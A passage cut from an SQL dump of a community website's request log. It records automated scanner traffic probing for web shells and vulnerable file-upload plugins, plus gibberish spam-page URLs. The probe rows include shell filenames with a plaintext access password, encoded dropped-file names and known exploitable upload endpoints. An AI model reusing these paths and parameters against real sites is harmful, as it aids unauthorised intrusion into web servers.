00:00:00'),(6290,'http://hallcrestheights.org//authenticating.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:55:04','0000-00-00 00:00:00'),(6291,'http://hallcrestheights.org//google-assist.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:55:12','0000-00-00 00:00:00'),(6292,'http://hallcrestheights.org//images/google-assist.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:55:20','0000-00-00 00:00:00'),(6293,'http://hallcrestheights.org//images/robots.txt.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:55:27','0000-00-00 00:00:00'),(6294,'http://hallcrestheights.org//elements.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:55:36','0000-00-00 00:00:00'),(6295,'http://hallcrestheights.org//xmlsrpc.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:55:44','0000-00-00 00:00:00'),(6296,'http://hallcrestheights.org//wp-cache.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:55:52','0000-00-00 00:00:00'),(6297,'http://hallcrestheights.org//images/404.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:56:01','0000-00-00 00:00:00'),(6298,'http://hallcrestheights.org//images/head.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:56:11','0000-00-00 00:00:00'),(6299,'http://hallcrestheights.org//cache/support.php?z3=MFNENmRLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:56:22','0000-00-00 00:00:00'),(6300,'http://hallcrestheights.org//RoseLeif.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:56:31','0000-00-00 00:00:00'),(6301,'http://hallcrestheights.org//Abbrevsprl.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:56:38','0000-00-00 00:00:00'),(6302,'http://hallcrestheights.org//show.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:56:46','0000-00-00 00:00:00'),(6303,'http://hallcrestheights.org//images/defau1t.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:56:53','0000-00-00 00:00:00'),(6304,'http://hallcrestheights.org//cli/40dd1d.php?z3=MFNENmRLLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:56:58','0000-00-00 00:00:00'),(6305,'http://hallcrestheights.org//infos.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:57:15','0000-00-00 00:00:00'),(6306,'http://hallcrestheights.org//cache/defau1t.php?z3=MFNENmRLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:57:23','0000-00-00 00:00:00'),(6307,'http://hallcrestheights.org//A.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:57:33','0000-00-00 00:00:00'),(6308,'http://hallcrestheights.org//bookmark.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:57:43','0000-00-00 00:00:00'),(6309,'http://hallcrestheights.org//wp-data.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:57:52','0000-00-00 00:00:00'),(6310,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:58:03','0000-00-00 00:00:00'),(6311,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:58:12','0000-00-00 00:00:00'),(6312,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:58:23','0000-00-00 00:00:00'),(6313,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:58:32','0000-00-00 00:00:00'),(6314,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:58:42','0000-00-00 00:00:00'),(6315,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-02-03 13:58:53','0000-00-00 00:00:00'),(6316,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:59:06','0000-00-00 00:00:00'),(6317,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:59:19','0000-00-00 00:00:00'),(6318,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:59:30','0000-00-00 00:00:00'),(6319,'http://hallcrestheights.org//wp-content/plugins/caches.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 13:59:49','0000-00-00 00:00:00'),(6320,'http://hallcrestheights.org//head.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:00:01','0000-00-00 00:00:00'),(6321,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:00:21','0000-00-00 00:00:00'),(6322,'http://hallcrestheights.org//cache/list.php?z3=MFNENmRLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:00:31','0000-00-00 00:00:00'),(6323,'http://hallcrestheights.org//images/interface.php?z3=MFNENmRLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:00:43','0000-00-00 00:00:00'),(6324,'http://hallcrestheights.org//sqldebug.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:00:55','0000-00-00 00:00:00'),(6325,'http://hallcrestheights.org//xmlrpc-activate.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:01:09','0000-00-00 00:00:00'),(6326,'http://hallcrestheights.org//keep.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:01:49','0000-00-00 00:00:00'),(6327,'http://hallcrestheights.org//tmpos.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:02:00','0000-00-00 00:00:00'),(6328,'http://hallcrestheights.org//link.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:02:11','0000-00-00 00:00:00'),(6329,'http://hallcrestheights.org//dcodzu.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:02:23','0000-00-00 00:00:00'),(6330,'http://hallcrestheights.org//codd.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:02:32','0000-00-00 00:00:00'),(6331,'http://hallcrestheights.org//cache/wcache7675n.PHP?z3=MFNENmRLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:02:44','0000-00-00 00:00:00'),(6332,'http://hallcrestheights.org//modules/mod_bookmark/helper.php?z3=MFNENmRLLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:02:55','0000-00-00 00:00:00'),(6333,'http://hallcrestheights.org//content.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:03:07','0000-00-00 00:00:00'),(6334,'http://hallcrestheights.org//wp-content/plugins/sfn.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:03:20','0000-00-00 00:00:00'),(6335,'http://hallcrestheights.org//wp-content/plugins/wp-lg3.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:03:32','0000-00-00 00:00:00'),(6336,'http://hallcrestheights.org//wp-content/plugins/wp-lg2.php?z3=MFNENmRLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:03:45','0000-00-00 00:00:00'),(6337,'http://hallcrestheights.org//shootmei.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:03:55','0000-00-00 00:00:00'),(6338,'http://hallcrestheights.org//dcodqg.php?z3=MFNENmRLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-03 14:04:08','0000-00-00 00:00:00'),(6339,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/0SD6dK.php',NULL,'','',1,0,'2017-02-03 14:04:23','0000-00-00 00:00:00'),(6340,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/0SD6dK.php',NULL,'','',1,0,'2017-02-03 14:04:31','0000-00-00 00:00:00'),(6341,'http://hallcrestheights.org//wp-content/uploads/0SD6dK.php',NULL,'','',1,0,'2017-02-03 14:04:40','0000-00-00 00:00:00'),(6342,'http://hallcrestheights.org//0SD6dK.php',NULL,'','',1,0,'2017-02-03 14:04:47','0000-00-00 00:00:00'),(6343,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/0SD6dK.php',NULL,'','',1,0,'2017-02-03 14:04:54','0000-00-00 00:00:00'),(6344,'http://hallcrestheights.org//media/jmails.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:05:09','0000-00-00 00:00:00'),(6345,'http://hallcrestheights.org//libraries/joomla/juser.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:05:11','0000-00-00 00:00:00'),(6346,'http://hallcrestheights.org//libraries/joomla/jmail.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',10,0,'2017-02-03 14:05:14','0000-00-00 00:00:00'),(6347,'http://hallcrestheights.org//libraries/joomla/jmails.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:05:17','0000-00-00 00:00:00'),(6348,'http://hallcrestheights.org//f.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',10,0,'2017-02-03 14:05:32','0000-00-00 00:00:00'),(6349,'http://hallcrestheights.org//wso.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:05:39','0000-00-00 00:00:00'),(6350,'http://hallcrestheights.org//lou-bna.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:05:48','0000-00-00 00:00:00'),(6351,'http://hallcrestheights.org//ku.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:05:55','0000-00-00 00:00:00'),(6352,'http://hallcrestheights.org//popup-pomo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:06:00','0000-00-00 00:00:00'),(6353,'http://hallcrestheights.org//wp-includes/upgrade/theme-compat/popup-pomo.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:06:05','0000-00-00 00:00:00'),(6354,'http://hallcrestheights.org//logo_img.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:06:12','0000-00-00 00:00:00'),(6355,'http://hallcrestheights.org//zeubda.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:06:16','0000-00-00 00:00:00'),(6356,'http://hallcrestheights.org//images/clean.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:06:22','0000-00-00 00:00:00'),(6357,'http://hallcrestheights.org//te.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:06:37','0000-00-00 00:00:00'),(6358,'http://hallcrestheights.org//libraries/joomla/go.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',10,0,'2017-02-03 14:06:45','0000-00-00 00:00:00'),(6359,'http://hallcrestheights.org//media/wso.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:07:10','0000-00-00 00:00:00'),(6360,'http://hallcrestheights.org//shell.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:07:19','0000-00-00 00:00:00'),(6361,'http://hallcrestheights.org//info.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:07:21','0000-00-00 00:00:00'),(6362,'http://hallcrestheights.org//images/stories/c00d.php',NULL,'','',11,0,'2017-02-03 14:07:52','0000-00-00 00:00:00'),(6363,'http://hallcrestheights.org//images/stories/shewil!.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:08:07','0000-00-00 00:00:00'),(6364,'http://hallcrestheights.org//sh-2017.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',5,0,'2017-02-03 14:08:23','0000-00-00 00:00:00'),(6365,'http://hallcrestheights.org//auithorze.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:08:33','0000-00-00 00:00:00'),(6366,'http://hallcrestheights.org//cache/asdf.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:08:36','0000-00-00 00:00:00'),(6367,'http://hallcrestheights.org//reasdme.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:08:46','0000-00-00 00:00:00'),(6368,'http://hallcrestheights.org//cv.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',10,0,'2017-02-03 14:09:07','0000-00-00 00:00:00'),(6369,'http://hallcrestheights.org//setting.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:09:18','0000-00-00 00:00:00'),(6370,'http://hallcrestheights.org//tmp/setting.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',10,0,'2017-02-03 14:09:22','0000-00-00 00:00:00'),(6371,'http://hallcrestheights.org//images/stories/readme.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',9,0,'2017-02-03 14:09:26','0000-00-00 00:00:00'),(6372,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-cwxbdeud-i20162633-kovfii-bptqu-hzxchh-k17264-rmxag-fpapuhg-fqvjdcl-bbvz.htm',NULL,'','',2,0,'2017-02-03 18:25:27','0000-00-00 00:00:00'),(6373,'http://www.hallcrestheights.org/k60540-jgletkym-drqzn-rvmlkswa-zvkecqq-neei-aqjzl-nplqfc-i20162637-nebx-ilnvoxbd-jveebikp.htm',NULL,'','',2,0,'2017-02-03 23:34:27','0000-00-00 00:00:00'),(6374,'http://hallcrestheights.org/jglet-kymd-rqzn-rvmlkswa-k54924-zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv-i20162629-oxbdjve.htm',NULL,'','',2,0,'2017-02-04 05:31:23','0000-00-00 00:00:00'),(6375,'http://hallcrestheights.org/k55224-fadla-jfnl-gfpc-vwgmyhde-cwxbdeud-i20162629-kovfii-bptqu-hzxchh.htm',NULL,'','',1,0,'2017-02-04 14:03:58','0000-00-00 00:00:00'),(6376,'http://hallcrestheights.org/ryvhr-hmqt/yysl-lgeajanp-i20162629-k55474-dmefnxhq.htm',NULL,'','',2,0,'2017-02-04 16:24:14','0000-00-00 00:00:00'),(6377,'http://hallcrestheights.org/mrcqgb-eifuwg-rabtnw/yrqs-i20162628-emgwko-whmemx-k24966-gkucy-bnpzkic.htm',NULL,'','',1,0,'2017-02-04 18:11:33','0000-00-00 00:00:00'),(6378,'http://hallcrestheights.org/survey',NULL,'','',4,0,'2017-02-04 20:46:10','0000-00-00 00:00:00'),(6379,'http://www.hallcrestheights.org/survey',NULL,'http://www.hallcrestheights.org/files/HH_Newsletter_201507.pdf','',2,0,'2017-02-04 20:48:41','0000-00-00 00:00:00'),(6380,'http://hallcrestheights.org/i20162628-k25316-gnfznx-vjxpal-titjsh-kyjy.htm',NULL,'','',2,0,'2017-02-04 22:08:40','0000-00-00 00:00:00'),(6381,'http://hallcrestheights.org/fadlaj-fnlgfp-cvwgmy/hdec-i20162628-wxbdeu-dkovfi-k46566-ibptq-uhzxchh.htm',NULL,'','',2,0,'2017-02-05 01:50:38','0000-00-00 00:00:00'),(6382,'http://hallcrestheights.org/i20162628-zmkued-tzjivy-oqxifg-xuhx-ptvuhm-iwnzko-rpvub-fgnqtpm-k46316-hprbikz-onmtla-jholjrd-klts.htm',NULL,'','',3,0,'2017-02-05 02:19:07','0000-00-00 00:00:00'),(6383,'http://hallcrestheights.org/lugdlt-rsmxxh-i20162628-ypzqjl-lzoh/njumnt-ecwfog-ywbiw-yrurfgv-fcwqzhr-ibnkny-k25266-feebsbj.htm',NULL,'','',5,0,'2017-02-05 04:27:15','0000-00-00 00:00:00'),(6384,'http://hallcrestheights.org/jglet-i20162629-kymd-k34124-rqzn-rvmlkswa-zvkecqqn-eeiaqj.htm',NULL,'','',2,0,'2017-02-05 14:46:47','0000-00-00 00:00:00'),(6385,'http://hallcrestheights.org/upttm-i20162629-nbea/k33674-tgrb-nqcdcncx-rdhcpgzz-dllimv.htm',NULL,'','',1,0,'2017-02-05 15:03:56','0000-00-00 00:00:00'),(6386,'http://hallcrestheights.org/dvisci-wbvwku-k25866-xkrbzo/msmv-i20162628-uclzup-hvqawu-oxzmn-pzvsgcr.htm',NULL,'','',1,0,'2017-02-05 18:39:03','0000-00-00 00:00:00'),(6387,'http://hallcrestheights.org/index.php/wp-json/wp/v2/posts/',NULL,'','',3,0,'2017-02-05 20:15:23','0000-00-00 00:00:00'),(6388,'http://www.hallcrestheights.org/upttm-k784-nbea-tgrb-nqcdcncx-rdhcpgzz-i20162633-dllimv-yxjlt-feobke-bwivs.htm',NULL,'','',13,0,'2017-02-06 11:29:54','0000-00-00 00:00:00'),(6389,'http://hallcrestheights.org/ixnmu-eahw-hioz-i20162629-hjxbnwpg-eyooayik-uksszq-cebaq-domytn-iholb-k54624-dentafy-mluzext.htm',NULL,'','',2,0,'2017-02-06 19:31:28','0000-00-00 00:00:00'),(6390,'http://hallcrestheights.org/ryvhrh-mqtyys-llgeaj/i20162628-anpd-mefnxh-k25366-qfhjdy-haoxr.htm',NULL,'','',1,0,'2017-02-06 19:56:09','0000-00-00 00:00:00'),(6391,'http://hallcrestheights.org/ryvhr-hmqt-yysl-lgeajanp-i20162629-k34024-dmefnxhq-fhjdyh-aoxrc.htm',NULL,'','',2,0,'2017-02-07 04:31:05','0000-00-00 00:00:00'),(6392,'http://www.hallcrestheights.org/k59773-kzpffms-xklrd-edhwge-fvbbgz-agpec-iyyu-i20162631-wuvfzt/',NULL,'http://search.yahoo.co.jp/','',10,0,'2017-02-07 11:29:48','0000-00-00 00:00:00'),(6393,'http://hallcrestheights.org/vqjny-spvh-oljp-i20162629-eurrtpil-uourxivl-btrhnn-mtqzk-k55524-owtsxp-pbgrr-cdsikib-kxnpfov.htm',NULL,'','',4,0,'2017-02-07 13:49:05','0000-00-00 00:00:00'),(6394,'http://hallcrestheights.org/pcscq-rufu-k33574-npkw/xpoideot-i20162629-wtvsoarm-osmgep-lalhe.htm',NULL,'','',5,0,'2017-02-07 14:37:40','0000-00-00 00:00:00'),(6395,'http://hallcrestheights.org/i20162628-dvisci-k46666-wbvwku-xkrbzo-msmv/uclzup-hvqawu-oxzmn-pzvsgcr-lycmczo.htm',NULL,'','',1,0,'2017-02-07 17:37:10','0000-00-00 00:00:00'),(6396,'http://hallcrestheights.org/upttmn-beatgr-bnqcdc-ncxr-dhcpgz-zdllim-k45816-vyxjl-tfeobke-i20162628-bwivsmq-krfbml.htm',NULL,'','',2,0,'2017-02-07 23:05:50','0000-00-00 00:00:00'),(6397,'http://hallcrestheights.org/jgletk-ymdrqz-nrvmlk-swaz/vkecqq-neeiaq-k46266-jzlnp-lqfcneb-i20162628-xilnvox-bdjvee.htm',NULL,'','',2,0,'2017-02-08 00:46:00','0000-00-00 00:00:00'),(6398,'http://www.hallcrestheights.org/i20162628-k48392-mrcq-gbeifuw-grabt-nwyrqs.htm',NULL,'','',5,0,'2017-02-08 01:13:18','0000-00-00 00:00:00'),(6399,'http://hallcrestheights.org/HH_0309.pdf',NULL,'','',8,0,'2017-02-09 01:39:04','0000-00-00 00:00:00'),(6400,'http://hallcrestheights.org/i20162628-jgletk-ymdrqz/k25466-nrvmlk-swaz-vkecqq-neeiaq.htm',NULL,'','',2,0,'2017-02-09 06:59:10','0000-00-00 00:00:00'),(6401,'http://hallcrestheights.org/dvisci-k25216-wbvwku-xkrbzo-i20162628-msmv-uclzup.htm',NULL,'','',1,0,'2017-02-09 09:49:25','0000-00-00 00:00:00'),(6402,'http://hallcrestheights.org/edzvdl-qcomnn-i20162628-mmcawv-bfuj-apyvrl-flxhqj-kuhkc-mumbhmg-znkohey-k25716-rupxpu-dzikmus.htm',NULL,'','',1,0,'2017-02-09 11:13:49','0000-00-00 00:00:00'),(6403,'http://hallcrestheights.org/wp-content/uploads/77090459.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-02-09 11:54:15','0000-00-00 00:00:00'),(6404,'http://hallcrestheights.org/license.php',NULL,'http://hallcrestheights.org/license.php','',50,0,'2017-02-09 11:54:17','0000-00-00 00:00:00'),(6405,'http://hallcrestheights.org/66224427.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-02-09 11:54:20','0000-00-00 00:00:00'),(6406,'http://hallcrestheights.org/wp-admin/admin-ajax.php',NULL,'http://hallcrestheights.org/wp-admin/admin-ajax.php','',85,0,'2017-02-09 11:54:21','0000-00-00 00:00:00'),(6407,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/4397692.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-02-09 11:54:24','0000-00-00 00:00:00'),(6408,'http://hallcrestheights.org/uploadify/uploadify.php?folder=/',NULL,'http://hallcrestheights.org/uploadify/uploadify.php?folder=/','',24,0,'2017-02-09 11:54:26','0000-00-00 00:00:00'),(6409,'http://hallcrestheights.org/53625420.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-02-09 11:54:30','0000-00-00 00:00:00'),(6410,'http://hallcrestheights.org/tiny_mce/plugins/tinybrowser/upload.php?type=file',NULL,'','',2,0,'2017-02-09 11:54:32','0000-00-00 00:00:00'),(6411,'http://hallcrestheights.org/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=',NULL,'http://hallcrestheights.org/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=','',2,0,'2017-02-09 11:54:33','0000-00-00 00:00:00'),(6412,'http://hallcrestheights.org/wp-content/plugins/88966602.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-02-09 11:55:08','0000-00-00 00:00:00'),(6413,'http://hallcrestheights.org/sites/all/libraries/elfinder/php/connector.minimal.php',NULL,'http://hallcrestheights.org/sites/all/libraries/elfinder/php/connector.minimal.php','',24,0,'2017-02-09 11:55:09','0000-00-00 00:00:00'),(6414,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/02749521.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-02-09 11:55:10','0000-00-00 00:00:00'),(6415,'http://hallcrestheights.org//wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php',NULL,'http://hallcrestheights.org//wp-content/plugins/jquery-html5-file-upload/jquery-html5-file-upload.php','',2,0,'2017-02-09 11:55:11','0000-00-00 00:00:00'),(6416,'http://hallcrestheights.org//wp-content/uploads/files/guest/25335245.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-02-09 11:55:14','0000-00-00 00:00:00'),(6417,'http://hallcrestheights.org//wp-content/plugins/woocommerce-product-options/includes/image-upload.php',NULL,'http://hallcrestheights.org//wp-content/plugins/woocommerce-product-options/includes/image-upload.php','',2,0,'2017-02-09 11:55:15','0000-00-00 00:00:00'),(6418,'http://hallcrestheights.org//wp-content/uploads/2017/2/42221242.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-02-09 11:55:16','0000-00-00 00:00:00'),(6419,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/24569042.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2017-02-09 11:55:18','0000-00-00 00:00:00'),(6420,'http://www.hallcrestheights.org/k26400-zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-tpmh-prbikzon-i20162635-mtlajhol-jrdklt.htm',NULL,'https://www.google.co.jp/','',7,0,'2017-02-09 12:57:40','0000-00-00 00:00:00'),(6421,'http://hallcrestheights.org//email.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:53:57','0000-00-00 00:00:00'),(6422,'http://hallcrestheights.org//functions.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:01','0000-00-00 00:00:00'),(6423,'http://hallcrestheights.org//cache/news.php?z3=TFh0T215LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-09 13:54:05','0000-00-00 00:00:00'),(6424,'http://hallcrestheights.org//tmp.php?z3=TFh0T215LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-02-09 13:54:07','0000-00-00 